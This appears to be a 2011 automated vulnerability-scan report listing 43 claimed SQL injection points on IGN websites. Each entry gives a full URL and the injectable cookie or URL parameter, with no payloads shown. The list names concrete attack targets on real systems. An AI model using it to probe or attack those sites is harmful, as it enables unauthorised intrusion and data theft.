XSS, DORK, SQL Injection, HTTP Header Injection, Report for 2-6-2011

The DORK Report for Feb 6, 2011 | CloudScan Vulnerability Crawler Report

Report generated by XSS.CX at Sun Feb 06 20:43:09 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://cheats.ign.com/index/xbox-360-cheats/index.html [i18n-cc cookie]

1.2. http://cheats.ign.com/ob2/068/077/077723.html [optimizelyBuckets cookie]

1.3. http://cheats.ign.com/ob2/068/142/14235018.html [_br_uid_1 cookie]

1.4. http://de.ign.com/event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect= [REST URL parameter 2]

1.5. http://de.ign.com/event.ng/Type=click&FlightID=69584&AdID=182992&TargetID=9128&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,46,60,72,80,91,101,110,150,152,260,471,531,757,912,1187,1405,1481,1508,1591,1824,2336,3091,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61346,61578,61766,65369&RawValues=&Redirect=http:/www.direct2drive.com/ [REST URL parameter 2]

1.6. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59028,59328,60710,61583,61766,65373&RawValues=&random=cmKIryK,bguRrblewbsuK [REST URL parameter 2]

1.7. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=144177&FlightID=130644&TargetID=22858&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,15271,15363,16020,16249,16251,19623,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,22858,19760,24104&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59028,59328,60710,61583,61766,65373&RawValues=&random=bxmcqAA,bguRqRgbdmoWA [REST URL parameter 2]

1.8. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61255,61583,61766,65373&RawValues=&random=dbmriqk,bguRrfrbdmWan [REST URL parameter 2]

1.9. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158918&FlightID=142379&TargetID=24864&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19926,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24864&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61255,61583,61766,65373&RawValues=&random=bRWKwsN,bguRragewbmIc [REST URL parameter 2]

1.10. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61256,61583,61766,65373&RawValues=&random=bzpcKwp,bguRrfrbdmWap [REST URL parameter 2]

1.11. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158919&FlightID=142380&TargetID=24899&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,19927,22099,22854,23425,23427,23472,23479,23480,23493&Targets=10619,24899&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61256,61583,61766,65373&RawValues=&random=ARzkrx,bguRragewbmIe [REST URL parameter 2]

1.12. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=158994&FlightID=142418&TargetID=26016&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwoNmIm,bguRqRgbdmoWr [REST URL parameter 2]

1.13. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwoRrgj,bguRrfrbdmWae [REST URL parameter 2]

1.14. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=182992&FlightID=69584&TargetID=9128&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5329,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10820,11754,12248,14845,15232,16249,16251,17864,17898,17902,19172,20798,20834,20875,20904,22099,22285,22854,23359,23425,23427,23472,23479,23480,23493&Targets=6556,29462,7012,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bkNmutt,bguRragewbmAt [REST URL parameter 2]

1.15. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=183141&FlightID=161194&TargetID=8080&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bfhoukn,bguRrblewbsuv [REST URL parameter 2]

1.16. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bxtbict,bguRrfrbdmWag [REST URL parameter 2]

1.17. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cijnNxu,bguRragewbmAu [REST URL parameter 2]

1.18. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Rnehdv,bguRrblewbsuN [REST URL parameter 2]

1.19. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cWtjorh,bguRqRgbdmoWz [REST URL parameter 2]

1.20. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bWkwpka,bguRrblewbsuw [REST URL parameter 2]

1.21. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cblcosc,bguRqRgbdmoWs [REST URL parameter 2]

1.22. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy [REST URL parameter 2]

1.23. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy/ [REST URL parameter 2]

1.24. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof [REST URL parameter 2]

1.25. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=dlmndoi,bguRrehbdnkof/ [REST URL parameter 2]

1.26. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ddkKKby,bguRrfrbdmWak [REST URL parameter 2]

1.27. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bwmijfx,bguRragewbmAI [REST URL parameter 2]

1.28. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=chdstlw,bguRrblewbsus [REST URL parameter 2]

1.29. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9326,9598,9613,10951,11754,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619,11379,28685,11380&Values=25,31,43,60,72,80,91,101,110,150,152,235,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cadvdIl,bguRqRgbdmoWo [REST URL parameter 2]

1.30. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,7473,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cjkIIec,bguRrfrbdmWab [REST URL parameter 2]

1.31. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bynKldq,bguRragewbmAn [REST URL parameter 2]

1.32. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cnesoxW,bguRrfrbdmWai [REST URL parameter 2]

1.33. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bsrfnRp,bguRragewbmAx [REST URL parameter 2]

1.34. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=dlkpdlI,bguRrfrbdmWas [REST URL parameter 2]

1.35. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=zkitkg,bguRragewbmIi [REST URL parameter 2]

1.36. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkevoot,bguRrblewbsuy [REST URL parameter 2]

1.37. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=407,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11690,11716,11754,14845,15232,16249,16251,17917,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cwmukqW,bguRqRgbdmoWu [REST URL parameter 2]

1.38. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bkfKruw,bguRrblewbsuA [REST URL parameter 2]

1.39. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bvtAjns,bguRqRgbdmoWx [REST URL parameter 2]

1.40. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bezcjaa,bguRrblewbsur [REST URL parameter 2]

1.41. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=crblguo,bguRqRgbdmoWm [REST URL parameter 2]

1.42. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ccetvte,bguRrfrbdmWaa [REST URL parameter 2]

1.43. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=beykRvw,bguRragewbmAj [REST URL parameter 2]

